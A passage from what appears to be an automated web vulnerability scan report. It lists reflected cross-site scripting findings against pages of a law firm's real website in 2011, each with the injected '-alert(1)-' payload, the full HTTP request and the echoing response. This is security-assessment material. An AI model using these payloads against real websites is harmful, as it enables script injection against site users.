2.9. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /about_the_firm/firm_history

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3824'-alert(1)-'1b19dddffc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about_the_firm/firm_history?b3824'-alert(1)-'1b19dddffc8=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:43:35 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1298; path=/
Set-Cookie: PortletId=1293201; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18798


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | About the Firm | Firm History</title>
<meta na
...[SNIP]...
about_the_firm/firm_history/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/about_the_firm/firm_history/AboutSection.aspx?b3824'-alert(1)-'1b19dddffc8=1';//]]>
...[SNIP]...

2.10. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /balancingworkandfamilylife

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec112'-alert(1)-'d654b8e90b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /balancingworkandfamilylife?ec112'-alert(1)-'d654b8e90b6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:05 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1155; path=/
Set-Cookie: PortletId=1146501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14806


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Work-Life Balance</title>
<meta na
...[SNIP]...
= '/balancingworkandfamilylife/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/balancingworkandfamilylife/Diversity.aspx?ec112'-alert(1)-'d654b8e90b6=1';//]]>
...[SNIP]...

2.11. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /bestviewed

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18d5'-alert(1)-'b19132c4a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bestviewed?e18d5'-alert(1)-'b19132c4a4f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:20 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1359; path=/
Set-Cookie: PortletId=1350401; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10955


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Best Viewed</title>
<meta name="language" cont
...[SNIP]...
document.aspnetForm.action = '/bestviewed/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/bestviewed/GeneralPageData.aspx?e18d5'-alert(1)-'b19132c4a4f=1';//]]>
...[SNIP]...

2.12. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /biographies

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b19'-alert(1)-'10a178ca3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /biographies?c3b19'-alert(1)-'10a178ca3f5=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:05 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1141; path=/
Set-Cookie: PortletId=1132501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 152733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Biographies</title>
<meta name="language" cont
...[SNIP]...
DATA[
document.aspnetForm.action = '/biographies/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/biographies/Search.aspx?c3b19'-alert(1)-'10a178ca3f5=1';//]]>
...[SNIP]...

2.13. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /diversityoverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c748'-alert(1)-'750bc24037f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversityoverview?8c748'-alert(1)-'750bc24037f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:34:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1151; path=/
Set-Cookie: PortletId=1142501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17851


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Overview</title>
<meta name="langu
...[SNIP]...
.aspnetForm.action = '/diversityoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/diversityoverview/Diversity.aspx?8c748'-alert(1)-'750bc24037f=1';//]]>
...[SNIP]...

2.14. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /diversityupdate

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d31'-alert(1)-'bf8e984b8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diversityupdate?c2d31'-alert(1)-'bf8e984b8ec=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:46:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1156; path=/
Set-Cookie: PortletId=1147501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14611


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Diversity Update</title>
<meta nam
...[SNIP]...
ment.aspnetForm.action = '/diversityupdate/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/diversityupdate/Diversity.aspx?c2d31'-alert(1)-'bf8e984b8ec=1';//]]>
...[SNIP]...

2.15. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /extranet

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f529'-alert(1)-'c70c33782c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /extranet?6f529'-alert(1)-'c70c33782c6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:16 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1260; path=/
Set-Cookie: PortletId=1254901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11206


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
A[
document.aspnetForm.action = '/extranet/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/extranet/GeneralPageData.aspx?6f529'-alert(1)-'c70c33782c6=1';//]]>
...[SNIP]...

2.16. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /firmoverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d58f'-alert(1)-'8538235fe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /firmoverview?9d58f'-alert(1)-'8538235fe28=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1144; path=/
Set-Cookie: PortletId=1135501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17085


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | About the Firm | Firm Overview</title>
<meta n
...[SNIP]...
ocument.aspnetForm.action = '/firmoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/firmoverview/AboutSection.aspx?9d58f'-alert(1)-'8538235fe28=1';//]]>
...[SNIP]...

2.17. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /forum

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6be'-alert(1)-'7a5f32d74e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forum?cb6be'-alert(1)-'7a5f32d74e6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:47:41 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1169; path=/
Set-Cookie: PortletId=1162901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14641


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Women...s Forum</title>
<meta name
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/forum/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/forum/Diversity.aspx?cb6be'-alert(1)-'7a5f32d74e6=1';//]]>
...[SNIP]...

2.18. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /honorsrankings

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4088'-alert(1)-'6fb7096a36d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

